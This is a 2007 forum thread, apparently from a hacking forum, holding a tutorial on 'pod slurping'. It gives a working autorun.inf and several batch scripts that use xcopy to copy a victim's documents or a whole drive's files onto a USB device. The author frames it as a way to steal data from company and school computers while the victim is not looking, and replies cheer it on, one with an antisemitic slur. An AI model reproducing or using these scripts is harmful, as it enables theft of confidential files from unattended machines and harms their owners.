Results 1 to 5 of 5
  1. #1
    condor01's Avatar
    Join Date
    Feb 2007
    Location
    In My Bed
    Posts
    765
    Reputation
    17
    Thanks
    91

    [Tut] Pod Slurping [Tut]

    This is my second Tutorial and will teach you how to Pod Slurp and can bring down companies and collect data from school computers.

    So what is "Pod Slurping"?

    Wikipedi*****m
    Pod Slurping is the act of using a portable data storage device such as a digital audio player to illicitly download large quantities of confidential data by directly plugging it into a computer where the data is held, and which may be on the inside of a firewall. As these storage devices become smaller and their storage capacity becomes greater, they are becoming an increasing security risk to companies and government agencies. Access is gained while the computer is unattended.
    To Pod Slurp you need to make an Autorun file and a batch file.

    The Autorun file

    Open Notepad and paste in:

    Code:
    [autorun]
    open=SLURP.bat
    action=Press "OK" to get SLURPED
    shell\\open\\command=SLURP.bat
    Save as "autorun.inf" without quotes.

    This will now run when you put in your portable data storage device in and open a batch file which will start to download the documents you want.

    The Batch File

    This will be ran when the user clicks on ok to start SLURPING.

    Open Notepad and Paste in:

    Code:
    Quote:
    @echo.
    @echo.Slurping in progress...
    @echo.
    @mkdir %~d0\\%computername%
    xcopy "C:\\Documents and Settings\\%username%\\My Documents\\*.doc " %~d0\\%computername% /s/k/c/f/h/y
    @echo.
    @echo.Slurping Completed.
    @echo.
    @pause
    This will start to download anything in the directory of My Documents and any file with .doc at the end of it.

    If you would like to download just one type of file in my documents then change the .doc bit to any extension you would like. If you would like to download multiple files then add another line of code:

    Code:
    @echo.
    @echo.Slurping in progress...
    @echo.
    @mkdir %~d0\\%computername%
    xcopy "C:\\Documents and Settings\\%username%\\My Documents\\*.doc" %~d0\\%computername% /s/k/c/f/h/y
    xcopy "C:\\Documents and Settings\\%username%\\My Documents\\*.jpg" %~d0\\%computername% /s/k/c/f/h/y
    @echo.
    @echo.Slurping Completed.
    @echo.
    @pause
    If you would like to search the whole hard drive for documents the you would use this:

    Code:
    @echo.
    @echo.Slurping in progress...
    @echo.
    @mkdir %~d0\\%computername%
    xcopy "C:\\*.doc" %~d0\\%computername% /s/k/c/f/h/y
    @echo.
    @echo.Slurping Completed.
    @echo.
    @pause
    As the same as the last one, if you would like to download another extension the you add another line of code:

    Code:
    @echo.
    @echo.Slurping in progress...
    @echo.
    @mkdir %~d0\\%computername%
    xcopy "C:\\*.doc" %~d0\\%computername% /s/k/c/f/h/y
    xcopy "C:\\*.jpg" %~d0\\%computername% /s/k/c/f/h/y
    @echo.
    @echo.Slurping Completed.
    @echo.
    @pause
    If you know the document you want but dont know where it is then change the star to the name of the document:

    Code:
    @echo.
    @echo.Slurping in progress...
    @echo.
    @mkdir %~d0\\%computername%
    xcopy "C:\\TEST RESULTS.doc" %~d0\\%computername% /s/k/c/f/h/y
    @echo.
    @echo.Slurping Completed.
    @echo.
    @pause
    Then save the batch file as SLURPING.bat. To do this you will need to change the save file as type to All files and save your file.

    Making this work

    To make this work put your two files on to your storage device and and when your victim is not looking plug your USB or iPod in and leave to run it will start to download the files. Take out your USB when done and you have their files.

    This will come up as you put your USB in:


    After Pressing Ok Command Prompt will come up and will start copying the files:


    You have successfully Slurped

    Made By Condor01 Do Not Post Without Permission or Without Credits
    Last edited by condor01; 12-11-2007 at 12:22 AM.

  2. #2
    BPK's Avatar
    Join Date
    Jun 2006
    Gender
    male
    Location
    N/A
    Posts
    6,057
    Reputation
    24
    Thanks
    205
    My Mood
    Angelic
    What. The. Fuck.

  3. #3
    condor01's Avatar
    Join Date
    Feb 2007
    Location
    In My Bed
    Posts
    765
    Reputation
    17
    Thanks
    91
    Quote Originally Posted by blackpkerstr View Post
    What. The. Fuck.
    Whats wrong with it?

  4. #4
    ace76543's Avatar
    Join Date
    Jan 2006
    Gender
    male
    Location
    next to iverson
    Posts
    5,661
    Reputation
    14
    Thanks
    304
    nothing, it's cool. i'm gonna do this with



    MY NEW IRIVER CLIX FROM THE JEW ES


    hi dave arun and ibey
    Last edited by ace76543; 12-11-2007 at 02:19 PM.

  5. #5
    condor01's Avatar
    Join Date
    Feb 2007
    Location
    In My Bed
    Posts
    765
    Reputation
    17
    Thanks
    91
    ok you feel free to do that :P

Similar Threads

  1. Sword rocket request tut
    By aoshi in forum Gunz General
    Replies: 4
    Last Post: 02-09-2006, 03:43 PM
  2. Helbreath International Hack/GM Hack tut
    By xxaznrjaexx in forum Hack Requests
    Replies: 1
    Last Post: 01-27-2006, 02:42 AM
  3. Tut. for k. gunz or J. gunz?
    By i eat trees in forum Hack Requests
    Replies: 0
    Last Post: 01-19-2006, 02:56 PM
  4. In-Depth Tut. to hacking in War Rock (Conc. to Dave)
    By fl0 in forum WarRock - International Hacks
    Replies: 15
    Last Post: 01-18-2006, 02:49 PM
  5. Tuts
    By Mukuro in forum Hack Requests
    Replies: 0
    Last Post: 01-09-2006, 04:54 PM